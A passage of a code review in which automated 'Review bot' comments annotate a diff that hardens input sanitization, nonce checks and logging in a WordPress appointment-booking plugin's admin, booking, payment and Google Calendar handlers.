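Review bot: `steps_duration` now goes through `map_deep()` but, unlike the `timeslot_duration` block in the next hunk, has no `is_array()` guard, so a scalar `steps_duration` value reaches `$steps_duration['hours']` as a string offset; mirror the `isset( $_POST[...] ) && is_array( $_POST[...] )` pattern and the `isset()` fallbacks used there, after which the inner `sanitize_text_field()` calls are redundant. Also visible in this hunk: `cost` is read and saved twice, to `saab_cost` and `saab_saab_cost`, under a duplicated `//Symbol` comment; the second block looks like a copy-paste leftover.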
@@ -951,22 +953,24 @@
                 update_post_meta( $post_id, 'saab_steps_duration', $sanitized_steps_duration );
             }
             //timeslot_duration
-            if ( isset( $_POST['booking_stops_after'] ) ) {
-                $booking_stops_after_duration = $_POST['booking_stops_after'];
+            $booking_stops_after_duration = ( isset( $_POST['booking_stops_after'] ) && is_array( $_POST['booking_stops_after'] ) )
+                ? map_deep( wp_unslash( $_POST['booking_stops_after'] ), 'sanitize_text_field' )
+                : array();
+            if ( ! empty( $booking_stops_after_duration ) ) {
                 $sanitized_booking_stops_after_duration = array(
-                    'hours' => sanitize_text_field( $booking_stops_after_duration['hours'] ),
-                    'minutes' => sanitize_text_field( $booking_stops_after_duration['minutes'] )
+                    'hours' => isset( $booking_stops_after_duration['hours'] ) ? $booking_stops_after_duration['hours'] : '',
+                    'minutes' => isset( $booking_stops_after_duration['minutes'] ) ? $booking_stops_after_duration['minutes'] : '',
                 );

                 // Update the post meta data with the field value
                 update_post_meta( $post_id, 'saab_booking_stops_after', $sanitized_booking_stops_after_duration );
             }
             //timeslot_duration
-            if ( isset( $_POST['timeslot_duration'] ) ) {
-                $timeslot_duration = sanitize_text_field($_POST['timeslot_duration']);
+            if ( isset( $_POST['timeslot_duration'] ) && is_array( $_POST['timeslot_duration'] ) ) {
+                $timeslot_duration = map_deep( wp_unslash( $_POST['timeslot_duration'] ), 'sanitize_text_field' );
                 $sanitized_timeslot_duration = array(
-                    'hours' => sanitize_text_field( $timeslot_duration['hours'] ),
-                    'minutes' => sanitize_text_field( $timeslot_duration['minutes'] )
+                    'hours' => isset( $timeslot_duration['hours'] ) ? $timeslot_duration['hours'] : '',
+                    'minutes' => isset( $timeslot_duration['minutes'] ) ? $timeslot_duration['minutes'] : '',
                 );

                 update_post_meta( $post_id, 'saab_timeslot_duration', $sanitized_timeslot_duration );
@@ -974,36 +978,35 @@

             //no_of_booking
             if ( isset( $_POST['no_of_booking'] ) ) {
-                $selected_date = absint($_POST['no_of_booking']);
+                $selected_date = absint( wp_unslash( $_POST['no_of_booking'] ) );
                 update_post_meta( $post_id, 'saab_no_of_booking', $selected_date );
             }
             //waiting List
-            if (isset($_POST['waiting_list']) && filter_var($_POST['waiting_list'], FILTER_VALIDATE_BOOLEAN)) {
-                update_post_meta($post_id, 'saab_waiting_list', 1);
+            if ( isset( $_POST['waiting_list'] ) && filter_var( wp_unslash( $_POST['waiting_list'] ), FILTER_VALIDATE_BOOLEAN ) ) {
+                update_post_meta( $post_id, 'saab_waiting_list', 1 );
             } else {
                 delete_post_meta($post_id, 'saab_waiting_list');
             }
             //timeslotBookingAllowed
-            if (isset($_POST['timeslot_BookAllow']) && filter_var($_POST['timeslot_BookAllow'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['timeslot_BookAllow'] ) && filter_var( wp_unslash( $_POST['timeslot_BookAllow'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_timeslot_BookAllow', 1);
             } else {
                 delete_post_meta($post_id, 'saab_timeslot_BookAllow');
             }
             //enable_auto_approve
-            if (isset($_POST['enable_auto_approve']) && filter_var($_POST['enable_auto_approve'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_auto_approve'] ) && filter_var( wp_unslash( $_POST['enable_auto_approve'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_auto_approve', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_auto_approve');
             }
             //multiple breaks
-            if (isset($_POST['breaktimeslots'])) {
-                $breaktimeslots = sanitize_text_field($_POST['breaktimeslots']);
-
-                // Sanitize and save the values
+            if ( isset( $_POST['breaktimeslots'] ) && is_array( $_POST['breaktimeslots'] ) ) {
+                $breaktimeslots = map_deep( wp_unslash( $_POST['breaktimeslots'] ), 'sanitize_text_field' );
+
                 $sanitized_breaktimeslots = array();
-                foreach ($breaktimeslots as $breaktimeslot) {
-                    $breakstart_time = sanitize_text_field($breaktimeslot['start_time']);
-                    $breakend_time = sanitize_text_field($breaktimeslot['end_time']);
+                foreach ( $breaktimeslots as $breaktimeslot ) {
+                    $breakstart_time = isset( $breaktimeslot['start_time'] ) ? $breaktimeslot['start_time'] : '';
+                    $breakend_time = isset( $breaktimeslot['end_time'] ) ? $breaktimeslot['end_time'] : '';
                     $sanitized_breaktimeslots[] = array(
                         'start_time' => $breakstart_time,
                         'end_time' => $breakend_time,
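Review bot: the break-slot values are sanitized as free text but never validated as times; `$breaktimeslot['start_time']` and `['end_time']` will accept any string and store it under saab_breaktimeslots. Since `map_deep( ..., 'sanitize_text_field' )` has already cleaned every value before the loop, the loop only normalises the shape, which makes it the natural place to reject entries that do not match the strict time format the slot generator expects rather than writing them to post meta.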
@@ -1023,16 +1026,15 @@
                     update_post_meta($post_id, 'saab_breaktimeslots', $sanitized_breaktimeslots);
                 }

-                if (isset($_POST['generatetimeslot'])) {
-                    $generatetimeslots = $_POST['generatetimeslot'];
-                    // Sanitize and save the values
+                $generatetimeslots = ( isset( $_POST['generatetimeslot'] ) && is_array( $_POST['generatetimeslot'] ) )
+                    ? map_deep( wp_unslash( $_POST['generatetimeslot'] ), 'sanitize_text_field' )
+                    : array();
+                if ( ! empty( $generatetimeslots ) ) {
                     $sanitized_generatetimeslots = array();
-                    foreach ($generatetimeslots as $generatetimeslot) {
-                        $generatestart_time = $generatetimeslot['start_time'];
-                        $generateend_time = $generatetimeslot['end_time'];
+                    foreach ( $generatetimeslots as $generatetimeslot ) {
                         $sanitized_generatetimeslots[] = array(
-                        'start_time' => $generatestart_time,
-                        'end_time' => $generateend_time,
+                            'start_time' => isset( $generatetimeslot['start_time'] ) ? $generatetimeslot['start_time'] : '',
+                            'end_time' => isset( $generatetimeslot['end_time'] ) ? $generatetimeslot['end_time'] : '',
                         );
                     }
                     update_post_meta($post_id, 'saab_generatetimeslot', $sanitized_generatetimeslots);
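Review bot: the new `if ( ! empty( $generatetimeslots ) )` guard changes behaviour for an empty submission: the old code ran update_post_meta() for any posted `generatetimeslot`, so an empty list cleared the stored slots, whereas now an empty or non-array value leaves the previous saab_generatetimeslot meta untouched. If clearing is a supported action, handle it explicitly with delete_post_meta() in an else branch, as the boolean settings above do.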
@@ -1050,44 +1052,46 @@
                 }

             //Enable Recurring Events
-            if (isset($_POST['enable_recurring_apt']) && filter_var($_POST['enable_recurring_apt'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_recurring_apt'] ) && filter_var( wp_unslash( $_POST['enable_recurring_apt'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_recurring_apt', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_recurring_apt');
             }
-            if (isset($_POST['enable_advance_setting']) && filter_var($_POST['enable_advance_setting'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_advance_setting'] ) && filter_var( wp_unslash( $_POST['enable_advance_setting'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_advance_setting', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_advance_setting');
             }
-            if (isset($_POST['recurring_type'])) {
-                $recurring_type = sanitize_text_field($_POST['recurring_type']);
-                update_post_meta($post_id, 'saab_recurring_type', $recurring_type);
-            }
-            if (isset($_POST['recur_weekdays'])) {
-                $sanitized_recur_weekdays = array_map('sanitize_text_field', $_POST['recur_weekdays']);
-                update_post_meta($post_id, 'saab_recur_weekdays', $sanitized_recur_weekdays);
-            }
-            if (isset($_POST['advancedata'])) {
-                $advancedata = $_POST['advancedata'];
-                update_post_meta($post_id, 'saab_advancedata', $advancedata);
+            if ( isset( $_POST['recurring_type'] ) ) {
+                $recurring_type = sanitize_text_field( wp_unslash( $_POST['recurring_type'] ) );
+                update_post_meta( $post_id, 'saab_recurring_type', $recurring_type );
+            }
+            if ( isset( $_POST['recur_weekdays'] ) ) {
+                $sanitized_recur_weekdays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['recur_weekdays'] ) );
+                update_post_meta( $post_id, 'saab_recur_weekdays', $sanitized_recur_weekdays );
+            }
+            if ( isset( $_POST['advancedata'] ) ) {
+                $advancedata = is_array( $_POST['advancedata'] )
+                    ? map_deep( wp_unslash( $_POST['advancedata'] ), 'sanitize_text_field' )
+                    : sanitize_text_field( wp_unslash( $_POST['advancedata'] ) );
+                update_post_meta( $post_id, 'saab_advancedata', $advancedata );
             }else {
                 delete_post_meta($post_id, 'saab_advancedata');
             }
-            if (isset($_POST['holidays'])) {
-                $holidays = array_map('sanitize_text_field', $_POST['holidays']);
+            if ( isset( $_POST['holidays'] ) ) {
+                $holidays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['holidays'] ) );
                 update_post_meta($post_id, 'saab_holiday_dates', $holidays);
             }
-            if (isset($_POST['end_repeats'])) {
-                $end_repeats = sanitize_text_field($_POST['end_repeats']);
+            if ( isset( $_POST['end_repeats'] ) ) {
+                $end_repeats = sanitize_text_field( wp_unslash( $_POST['end_repeats'] ) );
                 update_post_meta($post_id, 'saab_end_repeats', $end_repeats);
             }
-            if (isset($_POST['end_repeats_on'])) {
-                $end_repeats_on = sanitize_text_field($_POST['end_repeats_on']);
+            if ( isset( $_POST['end_repeats_on'] ) ) {
+                $end_repeats_on = sanitize_text_field( wp_unslash( $_POST['end_repeats_on'] ) );
                 update_post_meta($post_id, 'saab_end_repeats_on', $end_repeats_on);
             }
-            if (isset($_POST['end_repeats_after'])) {
-                $end_repeats_after = sanitize_text_field($_POST['end_repeats_after']);
+            if ( isset( $_POST['end_repeats_after'] ) ) {
+                $end_repeats_after = sanitize_text_field( wp_unslash( $_POST['end_repeats_after'] ) );
                 update_post_meta($post_id, 'saab_end_repeats_after', $end_repeats_after);
             }
          }
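Review bot: the recurrence fields are sanitized but not validated: `recurring_type` is stored as arbitrary text rather than checked against the plugin's known recurrence options, `holidays` and `end_repeats_on` are dates that are never parsed, and `end_repeats_after` is a count that should go through absint() like `no_of_bookings` in the next hunk. Also, `recur_weekdays` and `holidays` use `array_map( 'sanitize_text_field', (array) ... )` while `advancedata` uses map_deep(); a nested array element would reach sanitize_text_field() as an array, so map_deep() is the consistent choice for all three.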
@@ -1110,41 +1114,41 @@
                 return;
             }

-            if (isset($_POST['notes'])) {
-                $notes = sanitize_textarea_field($_POST['notes']);
+            if ( isset( $_POST['notes'] ) ) {
+                $notes = sanitize_textarea_field( wp_unslash( $_POST['notes'] ) );
                 update_post_meta($post_id, 'saab_notes', $notes);
             }

-            if (isset($_POST['form_id'])) {
-                $form_id = sanitize_text_field($_POST['form_id']);
+            if ( isset( $_POST['form_id'] ) ) {
+                $form_id = sanitize_text_field( wp_unslash( $_POST['form_id'] ) );
             }

-            if (isset($_POST['no_of_bookings'])) {
-                $no_of_bookings = absint($_POST['no_of_bookings']);
+            if ( isset( $_POST['no_of_bookings'] ) ) {
+                $no_of_bookings = absint( wp_unslash( $_POST['no_of_bookings'] ) );
                 update_post_meta($post_id, 'saab_slotcapacity', $no_of_bookings);
             }

-            if (isset($_POST['booking_date'])) {
-                $booking_date = sanitize_text_field($_POST['booking_date']);
+            if ( isset( $_POST['booking_date'] ) ) {
+                $booking_date = sanitize_text_field( wp_unslash( $_POST['booking_date'] ) );
                 $currentMonth = gmdate('n',strtotime($booking_date));
                 $currentYear = gmdate('Y',strtotime($booking_date));
                 $currentday = gmdate('j', strtotime($booking_date));
                 $booking_date = 'saabid_'.$form_id.'_'.$currentMonth.'_'.$currentday.'_'.$currentYear;
                 update_post_meta($post_id, 'saab_booking_date', $booking_date);
             }
-            if (isset($_POST['start_time']) && isset($_POST['end_time'])) {
-                $start_time = trim(gmdate("h:i A", strtotime( sanitize_text_field($_POST['start_time']) )));
-                $end_time = trim(gmdate("h:i A", strtotime( sanitize_text_field($_POST['end_time']) )));
+            if ( isset( $_POST['start_time'] ) && isset( $_POST['end_time'] ) ) {
+                $start_time = trim( gmdate( 'h:i A', strtotime( sanitize_text_field( wp_unslash( $_POST['start_time'] ) ) ) ) );
+                $end_time  = trim( gmdate( 'h:i A', strtotime( sanitize_text_field( wp_unslash( $_POST['end_time'] ) ) ) ) );
                 $timeslot = $start_time.'-'.$end_time;
                 update_post_meta($post_id, 'saab_timeslot', $timeslot);
             }

-            if (isset($_POST['manual_notification']) &&  sanitize_text_field($_POST['manual_notification']  !== 'any')) {
-                $selected_action = isset($_POST['manual_notification']) ? sanitize_text_field($_POST['manual_notification']) : '';
-                $booking_status = isset($_POST['booking_status']) ? sanitize_text_field($_POST['booking_status']) : '';
-                // update_post_meta($post_id, 'saab_entry_status', $booking_status);
-                $bookingId = isset($_POST['post_id']) ? absint($_POST['post_id']) : '';
-                $status = isset($_POST['status']) ? sanitize_text_field($_POST['status']) : '';
+            if ( isset( $_POST['manual_notification'] ) && sanitize_text_field( wp_unslash( $_POST['manual_notification'] ) ) !== 'any' ) {
+                $selected_action  = isset( $_POST['manual_notification'] ) ? sanitize_text_field( wp_unslash( $_POST['manual_notification'] ) ) : '';
+                $booking_status  = isset( $_POST['booking_status'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_status'] ) ) : '';
+                // update_post_meta($post_id, 'saab_entry_status', $booking_status);
+                $bookingId       = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
+                $status          = isset( $_POST['status'] ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : '';
                 $formdata = get_post_meta($bookingId,'saab_submission_data',true);
                 $listform_label_val =$this->saab_admin_getkey_value_formshortcodes($post_id,$formdata);
                 $listform_label_val['Status'] = $booking_status;
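Review bot: `$form_id` is only assigned inside `if ( isset( $_POST['form_id'] ) )`, yet it is concatenated into `$booking_date` unconditionally (`'saabid_'.$form_id.'_'...`) and passed to saab_admin_send_notification() further down; initialise it before the isset block. The same block never checks the strtotime() result, so an unparseable `booking_date` silently becomes the epoch date instead of an error. Finally, `$bookingId` now comes from `$_POST['post_id']` and is used to read another entry's saab_submission_data; confirm the early-return guard at the top of this hunk covers that entry and not only `$post_id`.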
@@ -1152,9 +1156,9 @@
                 $send_notification =$this->saab_admin_send_notification($selected_action,$form_id, $post_id, $listform_label_val);
                 update_post_meta($post_id, 'saab_manual_notification', $selected_action);

-            }else{
-                $booking_status = isset($_POST['booking_status']) ? sanitize_text_field($_POST['booking_status']) : '';
-                update_post_meta($post_id, 'saab_entry_status', $booking_status);
+            } else {
+                $booking_status = isset( $_POST['booking_status'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_status'] ) ) : '';
+                update_post_meta( $post_id, 'saab_entry_status', $booking_status );
                 $formdata = get_post_meta($post_id,'saab_submission_data',true);
                 $listform_label_val =$this->saab_admin_getkey_value_formshortcodes($post_id,$formdata);
                 $listform_label_val['Status'] = $booking_status;
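Review bot: `$booking_status` is written to saab_entry_status straight from POST after sanitize_text_field(); it is later matched against notification types (`$notification['type'] === $status`), so validate it against the set of allowed statuses and reject anything else rather than storing arbitrary text as a status.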
@@ -1301,14 +1305,16 @@
                         $message = esc_html__('Email sent successfully','smart-appointment-booking');
                     } else {
                         $message = esc_html__('Failed to send email','smart-appointment-booking');
-                        error_log('Failed to send email');
+                        // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+                        error_log( 'Failed to send email' );
                     }
                 }

             }
-            if ($notificationFound === false) {
-                $message = esc_html__('Notification not found for the given status', 'smart-appointment-booking');
-                error_log('Notification not found for the given status');
+            if ( $notificationFound === false ) {
+                $message = esc_html__( 'Notification not found for the given status', 'smart-appointment-booking' );
+                // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+                error_log( 'Notification not found for the given status' );
             }
             return $message;
         }
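Review bot: the two error_log() calls here are now phpcs-ignored but still run unconditionally, whereas the equivalent logging in class.saab.front.action.php is wrapped in `if ( defined( 'WP_DEBUG' ) && WP_DEBUG )`; gate these the same way so production sites do not write to the log on every failed notification.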
--- a/smart-appointment-booking/inc/class.saab.php
+++ b/smart-appointment-booking/inc/class.saab.php
@@ -52,10 +52,6 @@

 			global $wp_version;

-			# Set filter for plugin's languages directory
-			$SAAB_lang_dir = dirname( SAAB_PLUGIN_BASENAME ) . '/languages/';
-			$SAAB_lang_dir = apply_filters( 'SAAB_languages_directory', $SAAB_lang_dir );
-
 			# Traditional WordPress plugin locale filter.
 			$get_locale = get_locale();

@@ -73,10 +69,8 @@
 			if ( file_exists( $mofile_global ) ) {
 				# Look in global /wp-content/languages/plugin-name folder
 				load_textdomain( 'smart-appointment-booking', $mofile_global );
-			} else {
-				# Load the default language files
-				load_plugin_textdomain( 'smart-appointment-booking', false, $SAAB_lang_dir );
 			}
+			# When hosted on WordPress.org, translations are loaded automatically; no load_plugin_textdomain() needed.
         }
     }
 }
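Review bot: dropping the `load_plugin_textdomain()` fallback means a bundled /languages/ directory is no longer consulted, so installs that do not receive translations from WordPress.org (private distributions, sites that ship translation packs inside the plugin) lose localisation; the `if ( file_exists( $mofile_global ) )` branch above is now the only loading path. If that is intended, say so in the changelog as well as the trailing comment; if not, keep the fallback and remove only the custom `SAAB_languages_directory` filter.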
--- a/smart-appointment-booking/inc/front/class.saab.front.action.php
+++ b/smart-appointment-booking/inc/front/class.saab.front.action.php
@@ -109,16 +109,17 @@
 		function saab_summary() {
 			ob_start();
 			$user_id = get_current_user_id();
-			$post_ids = array();
+			$post_ids = array();
+			// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key, WordPress.DB.SlowDBQuery.slow_db_query_meta_value -- User's bookings filtered by user_mapped meta.
 			$args = array(
-				'post_type' => 'manage_entries',
-				'meta_key' => 'user_mapped',
-				'meta_value' => $user_id,
-				'fields' => 'ids',
+				'post_type'      => 'manage_entries',
+				'meta_key'       => 'user_mapped',
+				'meta_value'     => $user_id,
+				'fields'         => 'ids',
 				'posts_per_page' => 55,
 			);
-
-			$query = new WP_Query($args);
+
+			$query = new WP_Query( $args );

 			if ($query->have_posts()) {
 				while ($query->have_posts()) {
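Review bot: the `// phpcs:ignore WordPress.DB.SlowDBQuery...` comment sits on the line before `$args = array(`, but phpcs:ignore only suppresses the very next line, and the flagged `'meta_key'` / `'meta_value'` entries are two and three lines further down, so the sniff will still fire; wrap the array in `// phpcs:disable` / `// phpcs:enable` or put the ignore on the `'meta_key'` line. `'posts_per_page' => 55` is also an unexplained magic number; name it or make it filterable.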
@@ -268,13 +269,15 @@
 			return $isbooking_open;
 		}

-		function saab_save_form_submission() {
-			// ini_set('display_startup_errors', 1);
-			// ini_set('display_errors', 1);
-			// error_reporting(-1);
-		//if( ! wp_verify_nonce( 'saab_front_nonce' ) ){} // ignoring nonce validation error in the front form
-		$form_id = ( isset( $_POST['fid'] ) ) ? $_POST['fid'] : '';
-		$form_data = ( isset( $_POST['form_data'] ) ) ? $_POST['form_data'] : '';
+		function saab_save_form_submission() {
+			$nonce_key = isset( $_POST['nonce'] ) ? 'nonce' : ( isset( $_POST['security'] ) ? 'security' : '' );
+			$nonce_val = ( $nonce_key && isset( $_POST[ $nonce_key ] ) ) ? sanitize_text_field( wp_unslash( $_POST[ $nonce_key ] ) ) : '';
+			if ( ! $nonce_val || ! wp_verify_nonce( $nonce_val, 'my_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			$form_id = isset( $_POST['fid'] ) ? absint( wp_unslash( $_POST['fid'] ) ) : 0;
+			$form_data = isset( $_POST['form_data'] ) && is_array( $_POST['form_data'] ) ? map_deep( wp_unslash( $_POST['form_data'] ), 'sanitize_text_field' ) : array();
 		// User
 		$is_user_logged_in = is_user_logged_in();
 		$userLoginRequired = get_post_meta($form_id, 'saab_userLoginRequired', true);
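Review bot: the nonce check is the key fix, but the action string `'my_ajax_nonce'` reads like a placeholder; it must match the action passed to wp_create_nonce() where the front-end script is localised, or every submission fails with "Security check failed." Accepting either `nonce` or `security` as the field name also doubles what has to stay in sync with the JavaScript. Separately, `map_deep( ..., 'sanitize_text_field' )` on `form_data` strips newlines from every field, so multi-line textarea answers are flattened; use sanitize_textarea_field() for those field types.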
@@ -344,7 +347,11 @@

 								$usererror = true;
 								wp_send_json_error(array(
-									'message' => __('Error creating user '. $user_id->get_error_message(),'smart-appointment-booking'),
+									'message' => sprintf(
+										/* translators: %s: error message from user creation */
+										__( 'Error creating user %s', 'smart-appointment-booking' ),
+										$user_id->get_error_message()
+									),
 									'error' => $usererror,
 								));

@@ -585,14 +592,13 @@
 			// 	}
 			// }
 			if(empty($saab_amount)){
-				$error_message = "Amount configuration Error";
 				wp_delete_post($created_post_id, true);
 				wp_send_json_error(array(
-					'message' => __($error_message, 'smart-appointment-booking'),
+					'message' => __( 'Amount configuration Error', 'smart-appointment-booking' ),
 					'error' => true,
 				));
 			}
-			$stripetoken = ( isset( $_POST['token'] ) ) ? $_POST['token'] : '';
+			$stripetoken = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
 			// Set your Stripe Publishable key
 			SabStripe::setApiKey($secretKey); // Replace with your Stripe API key

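Review bot: the comment `// Set your Stripe Publishable key` above `SabStripe::setApiKey($secretKey)` is misleading; the call takes the secret key, and a maintainer following the comment could wire the publishable key in. Correct the comment and drop the trailing `// Replace with your Stripe API key`, which is stale once the value comes from plugin settings.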
@@ -636,10 +642,13 @@
 				// $payment_response = ( is_array( $paymentIntent ) || is_object( $paymentIntent ) ) ?  print_r( $paymentIntent, true ) : $paymentIntent;

 			}catch ( Exception $e ) {
-				$error_message = $e->getMessage();
 				wp_delete_post($created_post_id, true);
 				wp_send_json_error(array(
-					'message' => __($error_message, 'smart-appointment-booking'),
+					'message' => sprintf(
+						/* translators: %s: payment exception error message */
+						__( 'Payment error: %s', 'smart-appointment-booking' ),
+						$e->getMessage()
+					),
 					'error' => true,
 				));
 			}
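Review bot: `$e->getMessage()` from the payment library is sent verbatim to the browser inside the `Payment error: %s` response, which can expose internal details (key misconfiguration, library internals, upstream diagnostics) to any form submitter. Log the exception message server-side under WP_DEBUG, as this file does elsewhere, and return a generic user-facing message.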
@@ -744,24 +753,24 @@
 		 */

 		function saab_booking_form_submission() {
-// 			ini_set('display_startup_errors', 1);
-// ini_set('display_errors', 1);
-// error_reporting(-1);
-            $error ='';
-           // if( ! wp_verify_nonce( 'saab_front_nonce' ) ){}
-			$booking_date = ( isset( $_POST['booking_date'] ) ) ? $_POST['booking_date'] : '';
-			$explode_booking_date = explode('_',$booking_date);
-			$form_id = $explode_booking_date[1];
-			$format_bookingdate = $explode_booking_date[4] . "-" . $explode_booking_date[2] . "-" . $explode_booking_date[3];
-			$converted_bookingdate = date('Y-m-d', strtotime($format_bookingdate));
-			$timeslot = ( isset( $_POST['timeslot'] ) ) ? $_POST['timeslot'] : '';
-			//total availableseats
-			$slotcapacity = ( isset( $_POST['slotcapacity'] ) ) ? $_POST['slotcapacity'] : '';
-			//quantity
-			$bookedseats = ( isset( $_POST['bookedseats'] ) )? $_POST['bookedseats'] : '' ;
-			$form_id = isset($_POST['fid']) ? absint($_POST['fid']) : 0;
-			$form_data = isset( $_POST['form_data'] ) ? $_POST['form_data']:'';
-			if (is_array($form_data)) {
+			$nonce_key = isset( $_POST['nonce'] ) ? 'nonce' : ( isset( $_POST['security'] ) ? 'security' : '' );
+			$nonce_val = ( $nonce_key && isset( $_POST[ $nonce_key ] ) ) ? sanitize_text_field( wp_unslash( $_POST[ $nonce_key ] ) ) : '';
+			if ( ! $nonce_val || ! wp_verify_nonce( $nonce_val, 'my_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			$error = '';
+			$booking_date = isset( $_POST['booking_date'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_date'] ) ) : '';
+			$explode_booking_date = explode( '_', $booking_date );
+			$form_id = isset( $explode_booking_date[1] ) ? absint( $explode_booking_date[1] ) : 0;
+			$format_bookingdate = ( isset( $explode_booking_date[4], $explode_booking_date[2], $explode_booking_date[3] ) ) ? $explode_booking_date[4] . '-' . $explode_booking_date[2] . '-' . $explode_booking_date[3] : '';
+			$converted_bookingdate = $format_bookingdate ? gmdate( 'Y-m-d', strtotime( $format_bookingdate ) ) : '';
+			$timeslot = isset( $_POST['timeslot'] ) ? sanitize_text_field( wp_unslash( $_POST['timeslot'] ) ) : '';
+			$slotcapacity = isset( $_POST['slotcapacity'] ) ? sanitize_text_field( wp_unslash( $_POST['slotcapacity'] ) ) : '';
+			$bookedseats = isset( $_POST['bookedseats'] ) ? sanitize_text_field( wp_unslash( $_POST['bookedseats'] ) ) : '';
+			$form_id = isset( $_POST['fid'] ) ? absint( wp_unslash( $_POST['fid'] ) ) : $form_id;
+			$form_data = isset( $_POST['form_data'] ) ? wp_unslash( $_POST['form_data'] ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- sanitized in loop below
+			if ( is_array( $form_data ) ) {
 				foreach ($form_data as $field_name => $field_value) {
 					// Check if the field value is an array (e.g., for checkboxes or multi-select)
 					if (is_array($field_value)) {
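Review bot: `slotcapacity` and `bookedseats` are seat counts but are sanitized with sanitize_text_field(), so a non-numeric value passes through to the capacity arithmetic; use absint() as is done for `fid`. `$form_id` is also derived twice, first from the second segment of `booking_date` and then overridden from `fid`; if the two disagree the booking is recorded against `fid` while the date key still embeds the other form, so either validate that they match or stop encoding the form id in `booking_date`. The nonce block is a verbatim copy of the one in saab_save_form_submission(); factor it into a helper so the action name and accepted field names live in one place.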
@@ -988,13 +997,13 @@
 			wp_die();
 		}
 		function saab_add_event_to_calender(){
-
+			// OAuth callback from Google; code/state are from redirect, not form POST. Nonce not applicable.
+			// phpcs:disable WordPress.Security.NonceVerification.Recommended
 			ob_start();

-			if(isset($_GET['code'])){
-
-				require_once SAAB_DIR . '/inc/lib/google-library/vendor/autoload.php';
-				$stateParameter = ( isset( $_GET['state'] ) ) ? $_GET['state'] : '';
+			if ( isset( $_GET['code'] ) ) {
+				require_once SAAB_DIR . '/inc/lib/google-library/vendor/autoload.php';
+				$stateParameter = isset( $_GET['state'] ) ? sanitize_text_field( wp_unslash( $_GET['state'] ) ) : '';
 				$mystate = explode('T', $stateParameter);
 				$form_id = $mystate[0];
 				$post_id = $mystate[1];
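Review bot: `$mystate = explode('T', $stateParameter)` is followed by an unconditional `$mystate[1]` read, so a `state` value without a `T` yields an undefined-offset notice and an empty `$post_id`; check count( $mystate ) and cast both ids with absint() before use. The phpcs disable comment says a nonce is not applicable, but the OAuth `state` parameter exists precisely to bind the callback to the session that began the authorisation; carrying only the form and post ids leaves the callback unbound to the user who started it, so include a per-user nonce or transient in `state` and verify it here before touching the post.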
@@ -1039,9 +1048,9 @@

 				$client_new->setAccessType('offline');

-				if (isset($_GET['code'])) {
-
-					$token = $client_new->fetchAccessTokenWithAuthCode($_GET['code']);
+				if ( isset( $_GET['code'] ) ) {
+					$auth_code = sanitize_text_field( wp_unslash( $_GET['code'] ) );
+					$token = $client_new->fetchAccessTokenWithAuthCode( $auth_code );
 					$client_new->setAccessToken($token);
 					$service = new Google_Service_Calendar($client_new);

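Review bot: the inner `if ( isset( $_GET['code'] ) )` is redundant, since this block already sits inside the `if ( isset( $_GET['code'] ) )` at the top of the function, so its else path can never run; read the code once into `$auth_code` at the top and drop the nested check.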
@@ -1103,6 +1112,7 @@
 					}
 				}
 			}
+			// phpcs:enable WordPress.Security.NonceVerification.Recommended
 			return ob_get_clean();
 		}
 		/**
@@ -1116,23 +1126,26 @@
 		 * @return string             A message indicating the result of the email sending process.
 		 */
 		function saab_send_notification($status, $form_id, $post_id, $form_data) {
-			// Sanitize the status value from $_POST, if applicable
-			$status = (isset($_POST['status']) && !empty($_POST['status'])) ? sanitize_text_field($_POST['status']) : $status;
-
-			// Log status to ensure it's being received correctly
-			if (defined('WP_DEBUG') && WP_DEBUG) {
-				error_log('Status received: ' . $status);
+			// Status may be overridden from POST; nonce verified in calling AJAX handler.
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$status = ( isset( $_POST['status'] ) && ! empty( $_POST['status'] ) ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : $status;
+
+			// Log status to ensure it's being received correctly.
+			if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+				// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+				error_log( 'Status received: ' . $status );
 			}
-
+
 			$message = '';
 			$notificationFound = false;
-
+
 			// Get notification data
-			$get_notification_array = get_post_meta($form_id, 'saab_notification_data', true);
-
-			// Log the retrieved notification data for debugging
-			if (defined('WP_DEBUG') && WP_DEBUG) {
-				error_log('Notification array: ' . print_r($get_notification_array, true));
+			$get_notification_array = get_post_meta( $form_id, 'saab_notification_data', true );
+
+			// Log the retrieved notification data for debugging.
+			if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+				// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+				error_log( 'Notification array: ' . print_r( $get_notification_array, true ) );
 			}

 			// Check if the notification data exists and is an array
